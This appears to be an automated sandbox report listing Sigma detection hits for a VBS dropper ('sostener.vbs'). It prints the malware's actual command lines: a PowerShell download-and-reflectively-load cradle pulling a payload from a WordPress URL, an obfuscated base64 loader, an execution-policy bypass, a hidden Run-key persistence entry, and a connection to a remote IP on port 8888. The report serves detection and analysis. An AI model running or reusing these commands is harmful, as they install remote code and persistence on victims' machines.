                        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs')
                        Sigma detected: Potentially Suspicious PowerShell Child Processes
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7468, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , ProcessId: 7604, ProcessName: wscript.exe
                        Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs');powershell $KByHL;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [syst
                        Sigma detected: Script Interpreter Execution From Suspicious Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7468, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xx2.vbs" , ProcessId: 7604, ProcessName: wscript.exe
                        Sigma detected: Suspicious Script Execution From Temp Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine|base64offset|contains: I~%, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6916, ParentProcessName: powershell.exe, ProcessCommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, ProcessId: 1396, ProcessName: powershell.exe
                        Sigma detected: WScript or CScript Dropper
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6916, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 6368, ProcessName: wscript.exe
                        Sigma detected: Change PowerShell Policies to an Insecure Level
                        Source: Process startedAuthor: frack113: Data: Command: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, CommandLine|base64offset|contains: I~%, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6916, ParentProcessName: powershell.exe, ProcessCommandLine: powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\user\AppData\Local\Temp\xx1.ps1, ProcessId: 1396, ProcessName: powershell.exe
                        Sigma detected: Communication To Uncommon Destination Ports
                        Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 173.208.241.155, DestinationIsIpv6: false, DestinationPort: 8888, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 2124, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                        Sigma detected: CurrentVersion Autorun Keys Modification
                        Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
                        Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6916, TargetFilename: C:\Users\user\AppData\Local\Temp\xx2.vbs
                        Sigma detected: PowerShell Download Pattern
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs')
                        Sigma detected: PowerShell Web Download
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs')
                        Sigma detected: Suspicious Powershell In Registry Run Keys
                        Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: Powershell.exe -WindowStyle hidden "& 'C:\Users\user\AppData\Local\Temp\xx2.vbs' ", EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3272, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\_______________________-------------
                        Sigma detected: Usage Of Web Request Commands And Cmdlets
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$bikyg = '013';$knwmx = 'C:\Users\user\Desktop\sostener.vbs';[Byte[]] $nupcs = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nupcs).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.socmer/70/4202/sdaolpu/tnetnoc-pw/moc.anutroponoicamrofni.www//:sptth' , $knwmx , '_______________________-------------', $bikyg, '1', 'Roda' ));", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bi Gk awB5 Gc I 9 C Jw w DE Mw n Ds J Br G4 dwBt Hg I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu HU c Bj HM I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu HU c Bj HM KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 cwBv GM bQBl HI Lw 3 D Lw 0 DI M y C8 cwBk GE bwBs H dQ v HQ bgBl HQ bgBv GM LQBw Hc LwBt G8 Yw u GE bgB1 HQ cgBv H bwBu G8 aQBj GE bQBy G8 ZgBu Gk LgB3 Hc dw v C8 OgBz H d B0 Gg Jw g Cw I k Gs bgB3 G0 e g Cw I n F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 Xw t C0 LQ t C0 LQ t C0 LQ t C0 LQ t Cc L g CQ YgBp Gs eQBn Cw I n DE Jw s C JwBS G8 Z Bh Cc I p Ck Ow =';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\Desktop\sostener.vbs')
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 6916, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\sostener.vbs", ProcessId: 6368, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
